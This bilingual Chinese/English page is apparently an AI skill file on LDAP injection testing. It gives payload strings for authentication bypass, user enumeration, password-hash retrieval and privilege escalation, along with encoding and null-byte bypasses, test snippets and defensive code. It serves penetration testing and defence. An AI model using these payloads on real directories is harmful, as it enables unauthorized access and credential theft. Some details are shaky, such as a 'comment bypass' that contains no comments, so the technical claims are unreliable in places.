Back to Details

ldap-injection-testing

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

LDAP注入漏洞测试

LDAP Injection Vulnerability Testing

概述

Overview

LDAP注入是一种类似于SQL注入的漏洞,利用LDAP查询语句的构造缺陷,可能导致信息泄露、权限绕过等。本技能提供LDAP注入的检测、利用和防护方法。
LDAP injection is a vulnerability similar to SQL injection, which exploits flaws in the construction of LDAP query statements and may lead to information disclosure, privilege bypass, etc. This skill provides methods for detection, exploitation, and prevention of LDAP injection.

漏洞原理

Vulnerability Principle

应用程序将用户输入直接拼接到LDAP查询语句中,未进行充分验证和过滤,导致攻击者可以修改查询逻辑。
危险代码示例:
java
String filter = "(&(cn=" + userInput + ")(userPassword=" + password + "))";
ldapContext.search(baseDN, filter, ...);
Applications directly splice user input into LDAP query statements without sufficient validation and filtering, allowing attackers to modify query logic.
Dangerous Code Example:
java
String filter = "(&(cn=" + userInput + ")(userPassword=" + password + "))";
ldapContext.search(baseDN, filter, ...);

LDAP基础

LDAP Basics

查询语法

Query Syntax

基础查询:
(cn=John)
(objectClass=person)
(&(cn=John)(mail=john@example.com))
(|(cn=John)(cn=Jane))
(!(cn=John))
Basic Queries:
(cn=John)
(objectClass=person)
(&(cn=John)(mail=john@example.com))
(|(cn=John)(cn=Jane))
(!(cn=John))

特殊字符

Special Characters

需要转义的字符:
  • (
    )
    - 括号
  • *
    - 通配符
  • \
    - 转义符
  • /
    - 路径分隔符
  • NUL
    - 空字符
Characters Requiring Escaping:
  • (
    )
    - Parentheses
  • *
    - Wildcard
  • \
    - Escape character
  • /
    - Path separator
  • NUL
    - Null character

测试方法

Testing Methods

1. 识别LDAP输入点

1. Identify LDAP Input Points

常见功能:
  • 用户登录
  • 用户搜索
  • 目录浏览
  • 权限验证
Common Functions:
  • User login
  • User search
  • Directory browsing
  • Permission verification

2. 基础检测

2. Basic Detection

测试特殊字符:
*)(&
*)(|
*))(
*))%00
测试逻辑操作符:
*)(&(cn=*
*)(|(cn=*
*))(!(cn=*
Test Special Characters:
*)(&
*)(|
*))(
*))%00
Test Logical Operators:
*)(&(cn=*
*)(|(cn=*
*))(!(cn=*

3. 认证绕过

3. Authentication Bypass

基础绕过:
用户名: *)(&
密码: *
查询: (&(cn=*)(&)(userPassword=*))
更精确的绕过:
用户名: admin)(&(cn=admin
密码: *))
查询: (&(cn=admin)(&(cn=admin)(userPassword=*)))
Basic Bypass:
Username: *)(&
Password: *
Query: (&(cn=*)(&)(userPassword=*))
More Precise Bypass:
Username: admin)(&(cn=admin
Password: *))
Query: (&(cn=admin)(&(cn=admin)(userPassword=*)))

4. 信息泄露

4. Information Disclosure

枚举用户:
*)(cn=*
*)(uid=*
*)(mail=*
获取属性:
*)(|(cn=*)(userPassword=*
*)(|(objectClass=*)(cn=*
Enumerate Users:
*)(cn=*
*)(uid=*
*)(mail=*
Retrieve Attributes:
*)(|(cn=*)(userPassword=*
*)(|(objectClass=*)(cn=*

利用技术

Exploitation Techniques

认证绕过

Authentication Bypass

方法1:逻辑绕过
输入: *)(&
查询: (&(cn=*)(&)(userPassword=*))
结果: 匹配所有用户
方法2:注释绕过
输入: admin)(&(cn=admin
查询: (&(cn=admin)(&(cn=admin)(userPassword=*)))
方法3:通配符
输入: *)(|(cn=*)(userPassword=*
查询: (&(cn=*)(|(cn=*)(userPassword=*)(userPassword=*))
Method 1: Logical Bypass
Input: *)(&
Query: (&(cn=*)(&)(userPassword=*))
Result: Matches all users
Method 2: Comment Bypass
Input: admin)(&(cn=admin
Query: (&(cn=admin)(&(cn=admin)(userPassword=*)))
Method 3: Wildcard
Input: *)(|(cn=*)(userPassword=*
Query: (&(cn=*)(|(cn=*)(userPassword=*)(userPassword=*))

信息泄露

Information Disclosure

枚举所有用户:
搜索: *)(cn=*
结果: 返回所有cn属性
获取密码哈希:
搜索: *)(|(cn=*)(userPassword=*
结果: 返回用户和密码哈希
获取敏感属性:
搜索: *)(|(cn=*)(mail=*)(telephoneNumber=*
结果: 返回多个敏感属性
Enumerate All Users:
Search: *)(cn=*
Result: Returns all cn attributes
Retrieve Password Hashes:
Search: *)(|(cn=*)(userPassword=*
Result: Returns users and password hashes
Retrieve Sensitive Attributes:
Search: *)(|(cn=*)(mail=*)(telephoneNumber=*
Result: Returns multiple sensitive attributes

权限提升

Privilege Escalation

修改查询逻辑:
原始: (&(cn=user)(memberOf=CN=Users,DC=example,DC=com))
注入: user)(memberOf=CN=Admins,DC=example,DC=com))(|(cn=user
结果: 可能绕过权限检查
Modify Query Logic:
Original: (&(cn=user)(memberOf=CN=Users,DC=example,DC=com))
Injection: user)(memberOf=CN=Admins,DC=example,DC=com))(|(cn=user
Result: May bypass permission checks

绕过技术

Bypass Techniques

编码绕过

Encoding Bypass

URL编码:
*)(& → %2A%29%28%26
*)(| → %2A%29%28%7C
Unicode编码:
* → \u002A
( → \u0028
) → \u0029
URL Encoding:
*)(& → %2A%29%28%26
*)(| → %2A%29%28%7C
Unicode Encoding:
* → \u002A
( → \u0028
) → \u0029

注释绕过

Comment Bypass

使用注释:
*)(&(cn=*
*)(|(cn=*
Using Comments:
*)(&(cn=*
*)(|(cn=*

空字符注入

Null Character Injection

使用NULL字节:
*))%00
Using NULL Byte:
*))%00

工具使用

Tool Usage

JXplorer

JXplorer

图形化LDAP客户端:
  • 连接LDAP服务器
  • 浏览目录结构
  • 执行查询测试
Graphical LDAP Client:
  • Connect to LDAP server
  • Browse directory structure
  • Execute query tests

ldapsearch

ldapsearch

bash
undefined
bash
undefined

基础查询

Basic Query

ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=*)"
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=*)"

测试注入

Test Injection

ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=*)(&"
undefined
ldapsearch -x -H ldap://target.com -b "dc=example,dc=com" "(cn=*)(&"
undefined

Burp Suite

Burp Suite

  1. 拦截LDAP查询请求
  2. 修改查询参数
  3. 观察响应结果
  1. Intercept LDAP query requests
  2. Modify query parameters
  3. Observe response results

Python脚本

Python Script

python
import ldap3

server = ldap3.Server('ldap://target.com')
conn = ldap3.Connection(server, authentication=ldap3.SIMPLE,
                        user='cn=admin,dc=example,dc=com',
                        password='password')
python
import ldap3

server = ldap3.Server('ldap://target.com')
conn = ldap3.Connection(server, authentication=ldap3.SIMPLE,
                        user='cn=admin,dc=example,dc=com',
                        password='password')

测试注入

Test Injection

filter_str = '*)(&' conn.search('dc=example,dc=com', filter_str) print(conn.entries)
undefined
filter_str = '*)(&' conn.search('dc=example,dc=com', filter_str) print(conn.entries)
undefined

验证和报告

Verification and Reporting

验证步骤

Verification Steps

  1. 确认可以控制LDAP查询
  2. 验证认证绕过或信息泄露
  3. 评估影响(未授权访问、数据泄露等)
  4. 记录完整的POC
  1. Confirm control over LDAP queries
  2. Verify authentication bypass or information disclosure
  3. Assess impact (unauthorized access, data leakage, etc.)
  4. Record complete POC

报告要点

Report Key Points

  • 漏洞位置和输入参数
  • LDAP查询构造方式
  • 完整的利用步骤和PoC
  • 修复建议(输入验证、参数化查询等)
  • Vulnerability location and input parameters
  • LDAP query construction method
  • Complete exploitation steps and PoC
  • Fix recommendations (input validation, parameterized queries, etc.)

防护措施

Prevention Measures

推荐方案

Recommended Solutions

  1. 输入验证
    java
    private static final String[] LDAP_ESCAPE_CHARS = 
    {"\\", "*", "(", ")", "\0", "/"};

public static String escapeLDAP(String input) {
    if (input == null) {
      return null;
    }
    StringBuilder sb = new StringBuilder();
    for (int i = 0; i < input.length(); i++) {
      char c = input.charAt(i);
      if (Arrays.asList(LDAP_ESCAPE_CHARS).contains(String.valueOf(c))) {
        sb.append("\\");
      }
      sb.append(c);
    }
    return sb.toString();
}
  2. 参数化查询
    java
    // 使用LDAP API的参数化功能
String filter = "(&(cn={0})(userPassword={1}))";
Object[] args = {escapedCN, escapedPassword};
// 使用API构建查询
  3. 白名单验证
    java
    // 只允许特定字符
if (!input.matches("^[a-zA-Z0-9@._-]+$")) {
    throw new IllegalArgumentException("Invalid input");
}
  4. 最小权限
    • LDAP连接使用最小权限账户
    • 限制可查询的属性
    • 使用访问控制列表
  5. 错误处理
    • 不返回详细错误信息
    • 统一错误响应
    • 记录错误日志
  1. Input Validation
    java
    private static final String[] LDAP_ESCAPE_CHARS = 
    {"\\", "*", "(", ")", "\0", "/"};

public static String escapeLDAP(String input) {
    if (input == null) {
      return null;
    }
    StringBuilder sb = new StringBuilder();
    for (int i = 0; i < input.length(); i++) {
      char c = input.charAt(i);
      if (Arrays.asList(LDAP_ESCAPE_CHARS).contains(String.valueOf(c))) {
        sb.append("\\");
      }
      sb.append(c);
    }
    return sb.toString();
}
  2. Parameterized Queries
    java
    // Use parameterized functionality of LDAP API
String filter = "(&(cn={0})(userPassword={1}))";
Object[] args = {escapedCN, escapedPassword};
// Build query using API
  3. Whitelist Validation
    java
    // Only allow specific characters
if (!input.matches("^[a-zA-Z0-9@._-]+$")) {
    throw new IllegalArgumentException("Invalid input");
}
  4. Least Privilege
    • Use accounts with minimal privileges for LDAP connections
    • Restrict queryable attributes
    • Use access control lists
  5. Error Handling
    • Do not return detailed error information
    • Use unified error responses
    • Record error logs

注意事项

Notes

  • 仅在授权测试环境中进行
  • 注意不同LDAP服务器的语法差异
  • 测试时避免对目录造成影响
  • 了解目标LDAP服务器的配置
  • Only perform in authorized testing environments
  • Note syntax differences between different LDAP servers
  • Avoid impacting the directory during testing
  • Understand the target LDAP server configuration